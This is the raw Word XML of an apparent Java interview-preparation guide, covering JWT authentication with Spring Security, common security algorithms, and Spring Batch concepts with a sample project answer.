    <w:p w14:paraId="08BC8453"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use this token to make requests to protected endpoints, by including the Authorization header with the token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D1D19"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JWT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C223B8"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The server does not need to store session information. The token contains all the information needed for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1294E"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JWT is compact and can be easily transmitted in URLs, HTTP headers, or cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA588C"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e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JWTs are signed, ensuring the integrity of the data and preventing tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23CA13"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the server does not need to store session state, JWT is highly scalable and ideal for distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C253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9FCF23F"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is a compact, URL-safe token format used for secure information exchange, commonly used in authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E61C00"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simplifies the integration of JWT by using spring-boot-starter-security and a custom filter that checks for JWT tokens in requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CCFFEB"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low involves generating a JWT upon user authentication, validating it on subsequent requests, and securing endpoints using Spring Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BE06D" w14:textId="30989E35" w:rsidR="006F4985" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006F498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346F25">
          <v:rect id="_x0000_i2162" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F4C9F0" w14:textId="467C4FFC" w:rsidR="006F4985" w:rsidRPr="00CE4B95" w:rsidRDefault="006F4985" w:rsidP="006F4985">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="_Toc197867705"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain a few </w:t>
      </w:r>
      <w:r w:rsidR="005A0D79"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ecurity </w:t>
      </w:r>
      <w:r w:rsidR="005A0D79" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>lgorithms?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w14:paraId="3E3E70CF" w14:textId="40E94F85" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here are a few commonly used </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security algorithms</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in software development and cybersecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A81B3"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0DE07">
          <v:rect id="_x0000_i2163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE9B5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1. Hashing Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B299D3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generate fixed-size output (hash) from variable-size input (e.g., passwords, messages). </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One-way</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – can't retrieve original data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168012B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MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 128-bit hash, now considered broken/insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A732F"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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 160-bit, also weak now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B01AC3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256 / SHA-512 (SHA-2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Stronger, widely used in modern systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A388129"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BCrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Adaptive hashing, used for password hashing with salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFF12A"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PBKDF2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Password-Based Key Derivation Function, includes salt and iteration count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293A7FC"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275E7">
          <v:rect id="_x0000_i2164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A02C36"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2. Encryption Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD0044"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w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>encrypt/decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FF2B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Symmetric Encryption (Same key for encrypt/decrypt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F314B"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AES (Advanced Encryption Standard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Industry standard, secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2E9C8"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ES/3DES (Data Encryption Standard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Older, no longer recommended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF67D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Asymmetric Encryption (Public/Private key pair)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F4FD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w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Used in SSL/TLS, digital signatures, secure key exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E6AF7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ECC (Elliptic Curve Cryptography)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Like RSA but with shorter keys and better performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E54EB4"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413">
          <v:rect id="_x0000_i2165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F092243"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3. Message Authentication Code (MAC) / Digital Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C743A22"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Used to ensure message integrity and authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7035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MAC-SHA256</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Keyed-hashing for message authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678FEE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igital Signature Algorithm (DSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7778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 with SHA-256 (RSASSA-PKCS1-v1_5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07122655"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D308C4">
          <v:rect id="_x0000_i2166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5530A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4. Token Algorithms (used in JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537F26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S256 / HS512</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – HMAC using SHA-256/512 (Symmetric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5AFF5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256 / RS512</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – RSA with SHA-256/512 (Asymmetric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14023646" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00CE4B9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67" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6CEDA" w14:textId="33E8DF77" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="009F301D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5480D8" w14:textId="0232285A" w:rsidR="00712F11" w:rsidRPr="00CE4B95" w:rsidRDefault="00712F11" w:rsidP="00712F11">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="492" w:name="_Toc197867706"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Batch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
    </w:p>
    <w:p w14:paraId="3C795115" w14:textId="77777777" w:rsidR="00131EF4" w:rsidRPr="00CE4B95" w:rsidRDefault="00131EF4">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1528735D"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3" w:name="_Toc197867707"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Spring batch? Explain where you have used the spring batch in your project?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w14:paraId="6030DFF9" w14:textId="510B4765" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="006B7D5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s a robust </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch processing framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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from a database, file, or queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB15EB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transformation of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A715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results to a database, file, or other systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29C8C7"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68" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D085569"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CE4B95" w14:paraId="1128C3B7" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C14BD3"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EF625B" w:rsidRPr="00CE4B95" w14:paraId="4009A231" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63E8F9BA"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processes, and writes records in chunks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="543F0124" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CA00E09"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fault tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="705388D6" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="101B9C4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with schedulers like Quartz, cron, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="1C280FF8" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB5703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nsistency using Spring transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="051A6F94" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F95CD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job execution status, metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="4D15A0D3" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62373FB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multithreading, partitioning, and remote chunking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51C79FFC"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69" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72515E83"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Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A3AADF"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jobs (Extract, Transform, Load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDEFA6A"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68398055"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transformation (CSV/Excel to DB or vice versa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD3631"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and cleanup tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D14AC3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70" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EF56B"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Have I Used Spring Batch?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA0DDB"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explain it in an interview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B2761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my previous project, we implemented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r batch job:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34084D28"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data from the CSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84D172"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each record using a custom validator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B63DB0E"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ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> records (e.g., date formats, enums)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D77D5B"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ote</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cleaned data into a PostgreSQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0DAA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onfigured chunk size as 500 and added </w:t>
      </w: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for skipping corrupt records while logging them for review.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot + Quartz</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14014DA1"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71" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="110BD0DD"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Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D586AAE"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t xml:space="preserve"> → Entire batch job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401582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t xml:space="preserve"> → Single unit of work in a job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E7EF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t xml:space="preserve"> → Reads data (from DB, file, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579C48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or</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Transforms data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B75B0D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t xml:space="preserve"> → Writes data (to DB, file, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CC466"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72" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD756AC"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Configuration Example (Java Config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D8C6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049FD78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1D4CC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616971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7BAEA39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tep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7F4E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30C5D81"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5C6BC7E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2DE0989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A06F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5EF9D0C0"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p>
    <w:p w14:paraId="30CA373C"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58B5B85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4E6D9648"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B163B"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Step"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5900B99D"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BDD9042"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DF3EDB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21F493F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3EDCA9C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BDA9B66" w14:textId="55EE413A"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222EC1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73" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C5D09"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4" w:name="_Toc197867708"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How spring batch works?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
    </w:p>
    <w:p w14:paraId="6734CA6F" w14:textId="19D6E443" w:rsidR="00D43640" w:rsidRPr="00CE4B95" w:rsidRDefault="00D43640" w:rsidP="001743A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atch works by defining </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
